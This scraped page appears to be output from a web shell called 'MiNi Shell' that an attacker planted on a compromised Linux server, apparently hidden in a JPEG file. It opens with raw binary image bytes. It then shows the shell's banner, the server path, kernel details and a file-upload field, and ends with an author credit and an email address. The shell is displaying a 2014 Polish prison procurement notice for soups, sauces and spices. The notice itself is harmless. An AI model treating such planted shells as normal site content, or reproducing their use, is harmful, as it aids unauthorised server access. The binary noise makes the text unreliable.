JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141219/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141219/415794-N-2014.html

<p class="kh_header"><b>Sieraków Ślaski: Sukcesywna dstawa zup, sosów, przypraw do Zakładu Karnego w Sierakowie Śląskim</b><br>
<b>Numer ogłoszenia: 415794 - 2014; data zamieszczenia: 19.12.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Karny w Sierakowie Śląskim , Ul. Cegielniana 13, 42-793 Sieraków Ślaski, woj. śląskie, tel. 343538505, faks 343538505.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sw.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka organizacyjna więziennictwa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywna dstawa zup, sosów, przypraw do Zakładu Karnego w Sierakowie Śląskim.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część I zupy, sosy
1. rosół jarzynowy w proszku o zawartości soli nie większej niż 45g w 100g suchego produktu, w ilości 1 260kg, dostawy sukcesywne po około 105kg, termin przydatności           do spożycia nie krótszy niż 90 dni od daty dostawy.
2. delikat do smażenia ryb o zawartości soli nie większej niż 50g w 100g suchego produktu w ilości 96kg, dostawy sukcesywne po około 8kg, termin przydatności do spożycia nie krótszy niż 90 dni od daty dostawy.
3. delikat do smażenia potraw mięsnych o zawartości soli nie większej niż 30g w 100g suchego produktu w ilości 96kg, dostawy sukcesywne po około 8kg, termin przydatności            do spożycia nie krótszy niż 90 dni od daty dostawy.
4. fix do gulaszu o zawartości soli nie większej niż 1,00g  w 100ml. przyrządzonego produktu, w ilości 144kg, dostawy sukcesywne po około 12kg, termin przydatności do spożycia nie krótszy niż  90 dni od daty dostawy.
5. sos biały o zawartości soli nie  większej niż 1,00g  w 100ml. przyrządzonego produktu w ilości 480kg, dostawy sukcesywne po około 40kg, termin przydatności do spożycia nie krótszy niż  90 dni od daty dostawy.
6. sos myśliwski o zawartości soli nie większej niż 1,00g  w 100ml. przyrządzonego produktu w ilości 180kg,  dostawy sukcesywne po około 15kg, termin przydatności                        do spożycia nie krótszy niż  90 dni od daty dostawy.
7. sos pieczeniowy o zawartości soli nie  większej niż 1,00g  w 100ml, przyrządzonego produktu w ilości 180kg, dostawy sukcesywne po około 15kg, termin przydatności                    do spożycia nie krótszy niż 90 dni od daty dostawy.
8. sos do sałatek o zawartości soli nie  większej niż 1,50g  w 100ml. przyrządzonego produktu, w ilości 96kg, dostawy sukcesywne po około 8kg, termin przydatności                           do spożycia nie krótszy niż 90 dni od daty dostawy.
9. sos do spaghetti o zawartości soli nie większej niż 1,60g  w 100ml. przyrządzonego produktu, w ilości 180kg, dostawy sukcesywne po około 15kg, termin przydatności                do spożycia nie krótszy niż  90 dni od daty dostawy.
10. zupa pieczarkowa o zawartości soli nie  większej niż 1,00g  w 100ml. przyrządzonego produktu w ilości 300kg, dostawy sukcesywne po około 25kg, termin przydatności                     do spożycia nie krótszy niż  90 dni od daty dostawy.
11. zupa brokułowa o zawartości soli nie  większej niż 2,40g  w 100ml. przyrządzonego produktu, w ilości 300kg, dostawy sukcesywne po około 25kg, termin przydatności              do spożycia nie krótszy niż 90 dni od daty dostawy.
12. zupa kalafiorowa o zawartości soli nie  większej niż 1,00g  w 100ml. przyrządzonego produktu w ilości 300kg, dostawy sukcesywne po około 25kg, termin przydatności                do spożycia nie krótszy niż 90 dni od daty dostawy.
13. zupa ogonowa o zawartości soli nie  większej niż 1,10g  w 100ml. przyrządzonego produktu w ilości 300kg, dostawy sukcesywne po około 25kg, termin przydatności                         do spożycia nie krótszy niż  90 dni od daty dostawy.
14. zupa szparagowa o zawartości soli nie  większej niż 1,00g  w 100ml. przyrządzonego produktu w ilości 300kg, dostawy sukcesywne po około 25kg. termin przydatności              do spożycia nie krótszy niż  90 dni od daty dostawy.
15. zupa żurek o zawartości soli nie  większej niż 1,00g  w 100ml. przyrządzonego produktu w ilości 180kg, dostawy sukcesywne po około 15kg, termin przydatności do spożycia nie krótszy niż 90 dni od daty dostawy.
16. zupa barszcz biały o zawartości soli nie  większej niż 1,00g  w 100ml. przyrządzonego produktu soli, w ilości 180kg, dostawy sukcesywne po około 15kg, termin przydatności                do spożycia nie krótszy niż  90 dni od daty dostawy
17. zupa borowikowa o zawartości soli nie  większej niż 1,00g  w 100ml. przyrządzonego produktu w ilości 300kg, dostawy sukcesywne po około 25kg, termin przydatności                       do spożycia nie krótszy niż  90 dni od daty dostawy

Część II przyprawy

1. kawa zbożowa w toebkach w ilości 960kg., dostawy sukcesywne po około 80kg, opakowanie od 1kg do 10kg. Termin przydatności nie krótszy niż 90 dni od daty dostawy.
2. herbata w torebkach  w ilości 420kg., dostawy sukcesywne po około 35kg, opakowanie od  1kg do 10kg. Termin	przydatności nie krótszy niż 90 dni od daty dostawy.
3. budyń waniliowy bez cukru w ilości 96kg, dostawy sukcesywne po około 8kg, opakowanie 0,04kg. do 1kg Termin przydatności nie krótszy niż 90 dni od daty dostawy.
4. kisiel owocowy bez cukru w ilości 120kg, dostawy sukcesywne po około 10kg, opakowanie 0,04kg do 1 kg. Termin przydatności  nie krótszy niż 90 dni od daty dostawy.
5. galaretka owocowa bez cukru w ilości 144kg, dostawy sukcesywne po około 12kg, opakowanie 0,04kg do 1 kg. Termin przydatności nie krótszy niż 90 dni od daty dostawy.
6. kwasek cytrynowy w ilości 96kg., dostawy sukcesywne po około 8kg, opakowanie               do 1kg., Termin przydatności nie krótszy niż 90 dni od daty dostawy.
7. musztarda w ilości 360kg, dostawy sukcesywne po około 30kg.,opakowanie od  1kg               do 5kg. Termin przydatności nie krótszy niż 90 dni od daty dostawy.
8. majonez w ilości 300kg, dostawy sukcesywne po około 25kg, opakowanie od 1kg        do 5kg., Termin przydatności nie krótszy niż 90 dni od daty dostawy.
9. Keczup łagodny w ilości 360kg, dostawy sukcesywne po około 30kg. opakowanie         od 1kg do 5kg., Termin przydatności  nie krótszy niż 90 dni od daty dostawy.
10. ocet w ilości 120l, dostawy sukcesywne po około 10l., opakowanie 0,5l. lub 1l, termin przydatności nie krótszy niż    90 dni od daty dostawy.
11. czosnek suszony mielony w ilości 60kg, dostawy sukcesywne po około 5kg, opakowanie do 1kg. Termin przydatności nie krótszy niż 90 dni od daty dostawy.
12. przyprawa do zup w płynie w ilości 1 200l, dostawy sukcesywne po około 100l, opakowanie od 0,900l. do 1l. Termin przydatności nie krótszy niż 90 dni od daty dostawy.
13.przyprawa uniwersalna o zawartości soli nie większej niż 70g w 100g suchego produktu w ilości 480kg, dostawy sukcesywne po około 40kg, termin przydatności do spożycia                nie krótszy niż 90 dni od daty dostawy.
14. liść laurowy w ilości 48kg, dostawy sukcesywne po  około 4kg, opakowanie do 1kg. Termin przydatności nie krótszy niż 90 dni od daty dostawy.
15. majeranek susz w ilości 36kg, dostawy sukcesywne po  około 3kg, opakowanie              do 1kg. Termin przydatności nie krótszy niż 90 dni od daty dostawy.
16. papryka sucha w ilości 60kg, dostawy sukcesywne po około 5kg, opakowanie do 1kg. Termin przydatności nie krótszy niż 90 dni od daty dostawy.
17. pieprz czarny mielony w ilości 78kg, dostawy sukcesywne po około 6,5kg, opakowanie do 1kg. Termin przydatności nie krótszy niż 90 dni od daty dostawy.
18. sól spożywcza jodowana w ilości 2 400kg, dostawy sukcesywne po  około 200kg, opakowanie do 25kg. Termin przydatności nie krótszy niż 90 dni od daty dostawy.
19. ziele angielskie w ilości 60kg, dostawy sukcesywne po  około 5kg, opakowanie          do 1kg. Termin przydatności nie krótszy niż 90 dni od daty dostawy.
20. Żelatyna spożywcza w ilości 6kg dostawy sukcesywne po  około 1kg, opakowanie          do 1kg. Termin przydatności nie krótszy niż 90 dni od daty dostawy.
21. Cynamon w ilości 36kg dostawy sukcesywne po około 3kg, opakowanie                         do 1kg. Termin przydatności nie krótszy niż 90 dni od daty dostawy..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.89.10.00-0, 15.89.19.00-9, 15.87.12.00-6, 15.87.12.60-4, 15.87.12.50-1, 15.87.12.50-5, 15.87.11.00-5, 15.86.00.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie i uzna warunek za spełniony na podstawie złożonego przez Wykonawcę oświadczenia potwierdzającego spełnienie wymagań określonych w art. 22 ust. 1 ustawy Pzp - załącznik nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie i uzna warunek za spełniony na podstawie złożonego przez Wykonawcę oświadczenia potwierdzającego spełnienie wymagań określonych w art. 22 ust. 1 ustawy Pzp - załącznik nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie i uzna warunek za spełniony na podstawie złożonego przez Wykonawcę oświadczenia potwierdzającego spełnienie wymagań określonych w art. 22 ust. 1 ustawy Pzp - załącznik nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie i uzna warunek za spełniony na podstawie złożonego przez Wykonawcę oświadczenia potwierdzającego spełnienie wymagań określonych w art. 22 ust. 1 ustawy Pzp - załącznik nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie i uzna warunek za spełniony na podstawie złożonego przez Wykonawcę oświadczenia potwierdzającego spełnienie wymagań określonych w art. 22 ust. 1 ustawy Pzp - załącznik nr 2 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>pełnomocnictwo, jeżeli jest wymagane</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Umowa może być zmieniona w stosunku do treści złożonej oferty w przypadkach wymienionych poniżej (zgodnie z art. 144 ust. 1 ustawy Pzp):
1. zmiana osób reprezentujących strony w przypadkach zmian organizacyjnych,
2. zmiana przepisów powszechnie obowiązujących, która wymusza zmianę treści umowy,
3. zmiany wynikające z okoliczności, których nie można było przewidzieć w dniu zawarcia umowy, a są one korzystne dla Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sw.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Karny w Sierakowie Śląskim
ul. Cegielniana 13
42-793 Ciasna
pok. nr 57.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.12.2014 godzina 10:00, miejsce: Zakład Karny w Sierakowie Śląskim
ul. Cegielniana 13
42-793 Ciasna
Sekretariat - budynek administracji.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> zupy, sosy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> rosół jarzynowy w ilości 1260kg, delikat do smażenia ryb w ilości 96kg, delikat do smażenia potraw 96kg, fix do gulaszu w ilości 144kg, sos biały w ilości 480kg, sos myśliwski w ilości 180kg, sos pieczeniowy w ilości 180kg, sos do sałatek w ilości 96kg, sos do spaghetti w ilości 180kg, zupa pieczarkowa w ilości 300kg, zupa brokułowa w ilości 300kg, zupa kalafiorowa w ilości 300kg, zupa ogonowa w ilości 300kg, zupa szparagowa w ilości 300kg, zupa żurek w ilości 180kg, zupa barszcz biały w ilości 180kg, zupa borowikowa w ilości 300kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.89.10.00-0, 15.89.19.00-9, 15.87.12.00-6, 15.87.12.60-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> przyprawy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> kawa zbożowa w torebkach w ilości 960kg, herbata w torebkach w ilości 420kg, budyń wanilowy bez cukru w ilości 96kg, kisiel owocowy bez cukru w ilości 120kg, galaretka owocowa bez cukru w ilości 144kg, kwasek cytrynowy w ilości 96kg, musztarda w ilości 360kg, majonez w ilości 300kg, keczup łagodny w ilości 360, ocet w ilości 120l, czosnek suszony mielony w ilości 60kg, przyprawa do zup w płynie w ilości 1200l, przyprawa uniwersalna w ilości 480kg, liść laurowy w ilości 48kg, majeranek susz w ilości 36kg, papryka sucha w ilości 60kg, pieprz czarny mielony w ilości 78kg, sól spożywcza jodowana w ilości 2400kg, ziele angielskie w ilości 60kg, żelatyna spożywcza w ilości 6kg, cynamon w ilości 36kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.87.12.00-6, 15.87.12.50-1, 15.87.12.58-0, 15.87.11.00-5, 15.86.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com